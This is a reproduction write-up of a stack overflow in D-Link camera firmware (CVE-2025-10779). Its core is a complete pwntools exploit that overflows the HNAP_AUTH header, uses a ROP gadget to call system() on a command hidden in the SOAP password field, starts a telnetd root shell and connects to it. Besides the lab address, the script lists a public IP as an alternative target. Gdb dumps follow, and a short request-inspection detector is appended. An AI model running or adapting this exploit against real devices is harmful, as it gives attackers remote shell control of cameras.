CVE-2025-10779: D-Link camera firmware stack overflow reproduction
References
IOT_sec/DCS-935L-1.pdf at main · scanleale/IOT_sec
ICS/IoT security: introductory lesson 1 on camera 0-day vulnerability hunting (bilibili)
Firmware emulated with FirmAE, debugged with gdb-multiarch.
Since the MIPS stack is executable, the usual route is ret2shellcode: look for a jr $sp gadget, or one that copies $sp into another register and then jumps through it.
No such gadget was found, so ROP is the only option.
1. MIPS is big-endian and the overflow is in strcpy, so how do we write an address whose high byte is \x00?
Use the behaviour of strtok to produce the high-order zero byte.
2. How to build the ROP chain?
The program has many calls to system.
Note this gadget:
0x0040c498 : move $a3, $s4 ; lw $gp, 0x20($sp) ; lw $t9, -0x7e04($gp) ; jalr $t9 ; move $a0, $s6
This gadget calls system with $s6 as the first argument, provided that 0x20($sp) holds the correct $gp value.
Through the stack overflow we control $s6.
3. How to control the argument?
Embed the command to run in content_body; debugging shows the heap base address does not change, so overwrite $s6 with the address of the command string.
Local testing successfully executed telnetd -l /bin/sh -p 1234 and obtained a shell.
```python
from pwn import *
context(arch='mips', endian='big', log_level='debug')
# addresses taken from the firmware binary
system = 0x0041C560
syscall = 0x004001e0
strcpy = 0x402920
gp = 0x438830
# --- configuration ---
local = 1
if local:
    target_ip = "192.168.0.1"
    target_port = 80
else:
    target_ip = "101.100.172.212"
    target_port = 3128
heap_base = 0x431000  # maybe; 0x4xx000
cmd_addr = heap_base + 0x218
cmd = 'telnetd -l /bin/sh -p 1234;'
# cmd = 'id;'
# the command string is placed in the SOAP body so that it lands on the heap
content_body = ''
content_body += '<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><LLL xmlns="http://purenetworks.com/HNAP1/"><Action></Action><Username></Username>'
content_body += '<LoginPassword>' + cmd + '</LoginPassword>'
content_body += '</LLL></soap:Body></soap:Envelope>'
# the overflowing value goes into the HNAP_AUTH header
payload_auth = b''
payload_auth += b'aciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaadaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaafpaafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaaghaagiaagjaagkaaglaagmaagnaagoagpaagqaagraagsaagtaaguaagvaagwaagxaagyaagzaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahraahsaahtaahuaahvaahwaahxaahyaahzaaibaaicaaidaaieaaifaaigaaihaaiiaaijaaikaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajcaajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaajuaajvaajwaajxaajyaajzaakbaakcaakdaakeaakfaakgaakhaakiaakjaakkaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaalfuckkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaamuaamvaamwaa'
payload_auth += b' \x43\x12\x18'  # cmd_addr
payload_auth += b'myaamAAa'
# payload_auth += b' ' + b'\x40\xa1\x64'  # system(binsh)
payload_auth += b' ' + b'\x40\xc4\x98'  # system($s6)
payload_auth += b'a'*0x10
raw_request = b''
raw_request += (
    f"POST /HNAP1/ HTTP/1.1\r\n"
    f"Host: {target_ip}:{target_port}\r\n"
    f'SOAPAction: "http://purenetworks.com/HNAP1/Login"\r\n'
    f"Pragma: no-cache\r\n"
    f"Cache-Control: no-cache\r\n"
    f"Upgrade-Insecure-Requests: 1\r\n"
    f"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\r\n"
    f"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
    f"Cookie: aaaa\r\n"
).encode()
raw_request += b'HNAP_AUTH: ' + payload_auth + b'\r\n'  # injection point
raw_request += (
    f"Accept-Encoding: gzip, deflate\r\n"
    f"Accept-Language: zh-CN, zh;q=0.9\r\n"
    f"Connection: close\r\n"
    f"Content-Length: {len(content_body)}\r\n"
    f"\r\n"
    f"{content_body}"
).encode()
io = remote(target_ip, target_port)
io.send(raw_request)
print(io.recvall())
io.close()
sleep(5)
# check whether the telnet listener started by the command is reachable
p = remote(target_ip, 1234, timeout=5)
p.sendline(b'echo HACK')
if p.recvuntil(b'HACK', timeout=5):
    log.success(f"Success\n")
    p.interactive()
```
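As an added example (not code from the original write-up), here is a small request-inspection rule written from the defender's side. It parses a raw HNAP1 request and reports the traits the request above depends on: an HNAP_AUTH header far longer than a legitimate HMAC-plus-timestamp value, non-printable bytes in that header, and shell-like content in the LoginPassword field. The length threshold, the regular expression and both sample requests are constructed assumptions, not values taken from the firmware.

```python
import re

# Assumed threshold: a legitimate HNAP_AUTH value is a hex HMAC plus a
# decimal timestamp, well under 128 bytes.
MAX_HNAP_AUTH_LEN = 128

# Shell separators and a couple of telltale tokens; a constructed heuristic,
# not a complete command-injection grammar.
SHELL_META = re.compile(r"[;|&`$]|telnetd|/bin/")


def parse_request(raw: bytes):
    """Split a raw HTTP request into (request line, header dict, body).

    Header names are lower-cased; values are kept as bytes so that
    non-printable content survives inspection.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().decode("latin-1").lower()] = value.strip()
    return request_line, headers, body


def inspect_hnap_request(raw: bytes) -> list:
    """Return a list of findings for an HNAP1 request; empty means clean."""
    findings = []
    request_line, headers, body = parse_request(raw)
    if "/HNAP1/" not in request_line:
        return findings

    auth = headers.get("hnap_auth", b"")
    if len(auth) > MAX_HNAP_AUTH_LEN:
        findings.append(f"HNAP_AUTH value too long ({len(auth)} bytes)")
    if any(b < 0x20 or b > 0x7E for b in auth):
        findings.append("HNAP_AUTH contains non-printable bytes")

    m = re.search(rb"<LoginPassword>(.*?)</LoginPassword>", body, re.S)
    if m:
        password = m.group(1).decode("latin-1", "replace")
        if SHELL_META.search(password):
            findings.append("LoginPassword contains shell metacharacters")
    return findings


# Constructed sample: an ordinary-looking Login request.
BENIGN_REQUEST = (
    b"POST /HNAP1/ HTTP/1.1\r\n"
    b"Host: 192.168.0.1\r\n"
    b'SOAPAction: "http://purenetworks.com/HNAP1/Login"\r\n'
    b"HNAP_AUTH: 0123456789ABCDEF0123456789ABCDEF01234567 1700000000\r\n"
    b"\r\n"
    b"<soap:Envelope><soap:Body><Login><LoginPassword>hunter2</LoginPassword>"
    b"</Login></soap:Body></soap:Envelope>"
)

# Constructed sample with the shape of the overflowing request: a very long
# header value with raw bytes in it and a command in the password field.
SUSPICIOUS_REQUEST = (
    b"POST /HNAP1/ HTTP/1.1\r\n"
    b"Host: 192.168.0.1\r\n"
    b'SOAPAction: "http://purenetworks.com/HNAP1/Login"\r\n'
    b"HNAP_AUTH: " + b"a" * 600 + b" \x01\x02\x03" + b"\r\n"
    b"\r\n"
    b"<soap:Envelope><soap:Body><LLL><LoginPassword>telnetd -l /bin/sh -p 1234;"
    b"</LoginPassword></LLL></soap:Body></soap:Envelope>"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("suspicious", SUSPICIOUS_REQUEST)):
        print(label, inspect_hnap_request(req) or "clean")
```

The three checks are independent, so a request that only trips the length rule is still reported; in a real deployment the threshold would be tuned to the longest HNAP_AUTH value the device's own clients send, and the body check would be treated as a lower-confidence signal because legitimate passwords can contain punctuation.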
```text
# 0x0040c498 : move $a3, $s4 ; lw $gp, 0x20($sp) ; lw $t9, -0x7e04($gp) ; jalr $t9 ; move $a0, $s6
# 0x00402a7c in _ftext ()
# LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
# ───────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────
# V0 0x431b48 —▸ 0x4314d8 ◂— 0x4c4c4c00 /* 'LLL' */
# V1 0
# A0 0
# A1 0
# A2 0x77a4267c (__malloc_state+4) —▸ 0x4311c8 —▸ 0x431198 ◂— 0
# A3 1
# T0 0xfffffffe
# T1 0
# T2 1
# T3 0
# T4 0
# T5 0x77a454e0 ◂— 'attr_setdetachstate'
# T6 0
# T7 0x402a3c (_ftext+3580) ◂— b _ftext+3604
# T8 0x71
# T9 0x77a4ecf0 (__pthread_unlock) ◂— lui $gp, 2
# *S0 0x6d726161 ('mraa')
# S1 0x6d736161 ('msaa')
# S2 0x6d746161 ('mtaa')
# S3 0x6d756161 ('muaa')
# S4 0x6d766161 ('mvaa')
# S5 0x6d776161 ('mwaa')
# S6 0x6d786161 ('mxaa')
# S7 0x6d796161 ('myaa')
# S8 0x6d410061
# GP 0x77a68ab0 ◂— 'xmlDocument_setOwnerDocument'
# FP 0x7fab8a68 —▸ 0x7fab8bcc ◂— 'a"http://purenetworks.com/HNAP1/Login"'
# SP 0x7fab8a68 —▸ 0x7fab8bcc ◂— 'a"http://purenetworks.com/HNAP1/Login"'
# RA 0xaabbcc
# *PC 0x402a7c (_ftext+3644) ◂— jr $ra
# ─────────────────────────────[ DISASM / mips / set emulate on ]──────────────────────────────
# 0x402a68 <_ftext+3624> lw $s4, 0x480($sp) S4, [0x7fab8ee8] => 0x6d766161 ('mvaa')
# 0x402a6c <_ftext+3628> lw $s3, 0x47c($sp) S3, [0x7fab8ee4] => 0x6d756161 ('muaa')
# 0x402a70 <_ftext+3632> lw $s2, 0x478($sp) S2, [0x7fab8ee0] => 0x6d746161 ('mtaa')
# 0x402a74 <_ftext+3636> lw $s1, 0x474($sp) S1, [0x7fab8edc] => 0x6d736161 ('msaa')
# 0x402a78 <_ftext+3640> lw $s0, 0x470($sp) S0, [0x7fab8ed8] => 0x6d726161 ('mraa')
# ► 0x402a7c <_ftext+3644> jr $ra <0xaabbcc>
# 0x402a80 <_ftext+3648> addiu $sp, $sp, 0x498
# ↓
# ──────────────────────────────────────────[ STACK ]──────────────────────────────────────────
# 00:0000│ fp sp 0x7fab8a68 —▸ 0x7fab8bcc ◂— 'a"http://purenetworks.com/HNAP1/Login"'
# 01:0004│+004 0x7fab8a6c ◂— 0
# ... ↓ 2 skipped
# 04:0010│+010 0x7fab8a78 ◂— 0x438830
# 05:0014│+014 0x7fab8a7c ◂— 0
# 06:0018│+018 0x7fab8a80 ◂— 'aaaa'
# 07:001c│+01c 0x7fab8a84 ◂— 0
# ────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────
# ► 0 0x402a7c _ftext+3644
# 0x00401c24 : lw $gp, 0x10($sp) ; lw $ra, 0x1c($sp) ; jr $ra ; addiu $sp, $sp, 0x20   controls $gp
# 0x00402220 : move $t9, $v0 ; jalr $t9 ; move $a1, $s1   controls $a1
# 0x00401d0c <+204>: addu a0,a0,s2
# 0x00401d10 <+208>: lw t9,0(a0)
# 0x00401d14 <+212>: jalr t9
# 0x00401d18 <+216>: sw v0,2740(s0)
# 0x403204 <main+1860>: lw gp,32(sp)
# 0x403208 <main+1864>: lui v0,0x43
# 0x40320c <main+1868>: sw zero,2768(v0)
# 0x403210 <main+1872>: lui v0,0x43
# 0x403214 <main+1876>: lw v0,2772(v0)
# 0x403218 <main+1880>: beqz v0,0x403240 <main+1920>
# 0x40321c <main+1884>: lui v0,0x43
# 0x403220 <main+1888>: lui a0,0x42
# 0x403224 <main+1892>: lw t9,-32260(gp)
# 0x403228 <main+1896>: jalr t9
# 0x40322c <main+1900>: addiu a0,a0,-12172
```